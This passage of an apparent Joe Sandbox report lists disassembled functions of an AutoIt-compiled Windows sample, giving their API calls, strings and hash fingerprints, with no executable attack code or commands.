                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                  • String ID:
                                                  • API String ID: 2156557900-0
                                                  • Opcode ID: 51b3be7d0210f0a9288b65bba2ef7e7d46fa0a8040ec58abdcf23a8a7bb613ef
                                                  • Instruction ID: 426421599284a130d2acc78f2d87875ed43f7c7016fa45876e0ce0be6d3e9c67
                                                  • Opcode Fuzzy Hash: 51b3be7d0210f0a9288b65bba2ef7e7d46fa0a8040ec58abdcf23a8a7bb613ef
                                                  • Instruction Fuzzy Hash: 4431BF79628248BFEF21DF55DC88F69BBA9FB1BB55F104064F800C62A0DB709E449B60
                                                  Function 008DA693 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • EnumChildWindows.USER32(?,008DAA64), ref: 008DA9A2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ChildEnumWindows
                                                  • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                  • API String ID: 3555792229-1603158881
                                                  • Opcode ID: 0c4d9ea9e0d6b246cf28d2dcb593268f5675c17fa1adca492c32eab79c6128e0
                                                  • Instruction ID: 4e2dc925223ff7dd897ef04362fd6a0816411f6cc4c8ade22bb07fda97d70933
                                                  • Opcode Fuzzy Hash: 0c4d9ea9e0d6b246cf28d2dcb593268f5675c17fa1adca492c32eab79c6128e0
                                                  • Instruction Fuzzy Hash: 2F91A47150060AEADB1CDF64C491BE9FB75FF04304F608226E899E7741DF30AA59CB92
                                                  Function 00882E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetWindowLongW.USER32(?,000000EB), ref: 00882EAE
                                                    • Part of subcall function 00881DB3: GetClientRect.USER32(?,?), ref: 00881DDC
                                                    • Part of subcall function 00881DB3: GetWindowRect.USER32(?,?), ref: 00881E1D
                                                    • Part of subcall function 00881DB3: ScreenToClient.USER32(?,?), ref: 00881E45
                                                  • GetDC.USER32 ref: 008BCF82
                                                  • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 008BCF95
                                                  • SelectObject.GDI32(00000000,00000000), ref: 008BCFA3
                                                  • SelectObject.GDI32(00000000,00000000), ref: 008BCFB8
                                                  • ReleaseDC.USER32(?,00000000), ref: 008BCFC0
                                                  • MoveWindow.USER32(?,?,?,?,?,?), ref: 008BD04B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                  • String ID: U
                                                  • API String ID: 4009187628-3372436214
                                                  • Opcode ID: 25e35885164b8acff5075453ef88c2fd0111983dd7c1deb3ec2dfc2fd0592aa0
                                                  • Instruction ID: 555e702abba64fdd958d062918b729e51e61bb607a8663d9c17df22b1d660a8b
                                                  • Opcode Fuzzy Hash: 25e35885164b8acff5075453ef88c2fd0111983dd7c1deb3ec2dfc2fd0592aa0
                                                  • Instruction Fuzzy Hash: 8C71D431500209EFCF21AF64C884AFA7BB6FF49364F1442A9ED55DA3A6D7318C42DB61
                                                  Function 00883015 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 71registrywindowclipboardCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetSysColorBrush.USER32(0000000F), ref: 00883074
                                                  • RegisterClassExW.USER32(00000030), ref: 0088309E
                                                  • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 008830AF
                                                  • LoadIconW.USER32(000000A9), ref: 008830F2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                  • API String ID: 975902462-1005189915
                                                  • Opcode ID: 1f98e9e92a54215c0c05fcf1a836caa9a425086a3bdc922ac0fa8b5daf656ce0
                                                  • Instruction ID: 32c6afa0f4624543f6cca9aeb3244529d7dd34ad4364af434543392857c2c867
                                                  • Opcode Fuzzy Hash: 1f98e9e92a54215c0c05fcf1a836caa9a425086a3bdc922ac0fa8b5daf656ce0
                                                  • Instruction Fuzzy Hash: D3318CB5829309EFDB10CFA4DC88AC9BFF4FB0A310F10416AE550E62A0D3B50645DF52
                                                  Function 00883041 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 54registrywindowclipboardCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetSysColorBrush.USER32(0000000F), ref: 00883074
                                                  • RegisterClassExW.USER32(00000030), ref: 0088309E
                                                  • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 008830AF
                                                  • LoadIconW.USER32(000000A9), ref: 008830F2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                  • API String ID: 975902462-1005189915
                                                  • Opcode ID: 7900522be52abbe50b4d366173a4eb7461e8a220f19a72e67d8057f6d5b64df0
                                                  • Instruction ID: 1bf6c01e04f4d9c48b7130295c086bca98e4126d89ae04665af2e3afb1ed064a
                                                  • Opcode Fuzzy Hash: 7900522be52abbe50b4d366173a4eb7461e8a220f19a72e67d8057f6d5b64df0
                                                  • Instruction Fuzzy Hash: 7B21C7B5925318AFDB10DFA4EC59B9DBBF4FB0A704F00412AF510E62A0D7B14644AF92
                                                  Function 008F8F5B Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0090F910), ref: 008F903D
                                                  • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0090F910), ref: 008F9071
                                                  • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 008F91EB
                                                  • SysFreeString.OLEAUT32(?), ref: 008F9215
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                  • String ID:
                                                  • API String ID: 560350794-0
                                                  • Opcode ID: 58ee88d8407a2a83a6a068fca10ff56a1b483149c88feb58bbfb6dd333941b3f
                                                  • Instruction ID: 8cbbaeb880b6fdb66c3eb4c0ccf15aa064a5e2d58c154b1c9bfa6809ee1f9915
                                                  • Opcode Fuzzy Hash: 58ee88d8407a2a83a6a068fca10ff56a1b483149c88feb58bbfb6dd333941b3f
                                                  • Instruction Fuzzy Hash: A2F10671A00119EFDB14DFA8C888EBEB7B9FF89314F108059EA55EB251DB31AE45CB50
                                                  Function 008FF9A8 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 008FF9C9
                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 008FFB5C
                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 008FFB80
                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 008FFBC0
                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 008FFBE2
                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 008FFD5E
                                                  • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 008FFD90
                                                  • CloseHandle.KERNEL32(?), ref: 008FFDBF
                                                  • CloseHandle.KERNEL32(?), ref: 008FFE36
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                  • String ID:
                                                  • API String ID: 4090791747-0
                                                  • Opcode ID: 341478a953f634f2ce490ae2ea2e1ac5730edf58acfaeef499bec69219c6ba35
                                                  • Instruction ID: 4ff2c17ddddbda30a89cc207b64f6e8433998181c0376017c1d15e653009a2eb
                                                  • Opcode Fuzzy Hash: 341478a953f634f2ce490ae2ea2e1ac5730edf58acfaeef499bec69219c6ba35
                                                  • Instruction Fuzzy Hash: 07E191312042559FCB14EF38C891A6ABBE1FF85354F18856DFA99CB2A2DB31DC41CB52
                                                  Function 0088201B Relevance: 13.7, APIs: 9, Instructions: 170timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00881B41: InvalidateRect.USER32(?,00000000,00000001), ref: 00881B9A
                                                  • DestroyWindow.USER32(?), ref: 008820D3
                                                  • KillTimer.USER32(-00000001,?), ref: 0088216E
                                                  • DestroyAcceleratorTable.USER32(00000000), ref: 008BBEF6
                                                  • DeleteObject.GDI32(00000000), ref: 008BBF6C
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                  • String ID:
                                                  • API String ID: 2402799130-0
                                                  • Opcode ID: b52a183389c8f847a54334eabaadd7eb13da1f11c43c6e34b7336ab90e98137d
                                                  • Instruction ID: afe006d647895f69efd38dffc80e90cfd8e355a48d2473512912d1e836efb073
                                                  • Opcode Fuzzy Hash: b52a183389c8f847a54334eabaadd7eb13da1f11c43c6e34b7336ab90e98137d
                                                  • Instruction Fuzzy Hash: 55619B79128B14DFDB35AF18DD48B69B7F1FF42316F108528E042D6A60CB71A981EF92
                                                  Function 008E4F63 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 008E48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,008E38D3,?), ref: 008E48C7
                                                    • Part of subcall function 008E48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,008E38D3,?), ref: 008E48E0
                                                    • Part of subcall function 008E4CD3: GetFileAttributesW.KERNEL32(?,008E3947), ref: 008E4CD4
                                                  • lstrcmpiW.KERNEL32(?,?), ref: 008E4FE2
                                                  • _wcscmp.LIBCMT ref: 008E4FFC
                                                  • MoveFileW.KERNEL32(?,?), ref: 008E5017
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                  • String ID:
                                                  • API String ID: 793581249-0
                                                  • Opcode ID: 98dcf285e9c065011986a381ba4ea6ac82b4082b83d4f75b27470a9f6d657db9
                                                  • Instruction ID: b70286abeb82c2f988032d0a940e83a18681869320ee9efb10f77980f00c2a23
                                                  • Opcode Fuzzy Hash: 98dcf285e9c065011986a381ba4ea6ac82b4082b83d4f75b27470a9f6d657db9
                                                  • Instruction Fuzzy Hash: EF5141B20087859BD624EB54C8919DFB3ECFF85344F10092EB689D3152EE74E6888767
                                                  Function 009088B4 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0090896E
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: InvalidateRect
                                                  • String ID:
                                                  • API String ID: 634782764-0
                                                  • Opcode ID: 4386ceddd5e81128c95751ab3a88b5b4eeb26952ed6f4bc9a2758e2bdec0ca8d
                                                  • Instruction ID: 8928c0afb93bae5b76a8562079e8a31a41083fdd21fe686bfbf86b8c8d97f160
                                                  • Opcode Fuzzy Hash: 4386ceddd5e81128c95751ab3a88b5b4eeb26952ed6f4bc9a2758e2bdec0ca8d
                                                  • Instruction Fuzzy Hash: C9517230704208BFDF309F28CC85BAB7B69FB15320F604516F9A5E69E1DF75A9809B91
                                                  Function 00882B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 008BC547
                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 008BC569
                                                  • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 008BC581
                                                  • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 008BC59F
                                                  • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 008BC5C0
                                                  • DestroyCursor.USER32(00000000), ref: 008BC5CF
                                                  • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 008BC5EC
                                                  • DestroyCursor.USER32(?), ref: 008BC5FB
                                                    • Part of subcall function 0090A71E: DeleteObject.GDI32(00000000), ref: 0090A757
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: CursorDestroyExtractIconImageLoadMessageSend$DeleteObject
                                                  • String ID:
                                                  • API String ID: 2975913752-0
                                                  • Opcode ID: 2e2fe8737ca0bf69b82b647bf92e5fa5d76eadce855af2bdce3b99dc37893d76
                                                  • Instruction ID: 85cdd4dfc8ccca560d753cf088310990478c0f0626a55106aefad21f162d9b04
                                                  • Opcode Fuzzy Hash: 2e2fe8737ca0bf69b82b647bf92e5fa5d76eadce855af2bdce3b99dc37893d76
                                                  • Instruction Fuzzy Hash: E8514874A10209EFDB20EF24CC45FAA7BA5FB55724F104528F902D76A0DB70ED90EB51
                                                  Function 008D8E03 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,008D8A84,00000B00,?,?), ref: 008D8E0C
                                                  • RtlAllocateHeap.NTDLL(00000000,?,008D8A84), ref: 008D8E13
                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,008D8A84,00000B00,?,?), ref: 008D8E28
                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,008D8A84,00000B00,?,?), ref: 008D8E30
                                                  • DuplicateHandle.KERNEL32(00000000,?,008D8A84,00000B00,?,?), ref: 008D8E33
                                                  • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,008D8A84,00000B00,?,?), ref: 008D8E43
                                                  • GetCurrentProcess.KERNEL32(008D8A84,00000000,?,008D8A84,00000B00,?,?), ref: 008D8E4B
                                                  • DuplicateHandle.KERNEL32(00000000,?,008D8A84,00000B00,?,?), ref: 008D8E4E
                                                  • CreateThread.KERNEL32(00000000,00000000,008D8E74,00000000,00000000,00000000), ref: 008D8E68
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Process$Current$DuplicateHandleHeap$AllocateCreateThread
                                                  • String ID:
                                                  • API String ID: 1422014791-0
                                                  • Opcode ID: 8f99695bf1bece97e188ad31def5256ce936f58bf57bf452a7f037480cd2a0c3
                                                  • Instruction ID: 2a920765a0cb2ed228923aef83d78f23ee01ace7803b67c198981bb87230ede4
                                                  • Opcode Fuzzy Hash: 8f99695bf1bece97e188ad31def5256ce936f58bf57bf452a7f037480cd2a0c3
                                                  • Instruction Fuzzy Hash: 8201BF75254304FFE760EB65DC4DF573B6CEB89B11F004521FA05DB691CA749900DB20
                                                  Function 008F9428 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Variant$ClearInit$_memset
                                                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                  • API String ID: 2862541840-625585964
                                                  • Opcode ID: 9675946036feeebbef9b7fc8689095952e37c0440a6df4ea5168a749ef2c882e
                                                  • Instruction ID: 6f187a0ecc6c77e76b16e5f918243748bb28414a901a88e814902b765fb533e6
                                                  • Opcode Fuzzy Hash: 9675946036feeebbef9b7fc8689095952e37c0440a6df4ea5168a749ef2c882e
                                                  • Instruction Fuzzy Hash: 0991BC70A00219ABDF24DFA5C848FAEBBB8FF99714F108159F645EB290D7749941CFA0
                                                  Function 00906FEF Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                                  Download Yara Rule
                                                  APIs
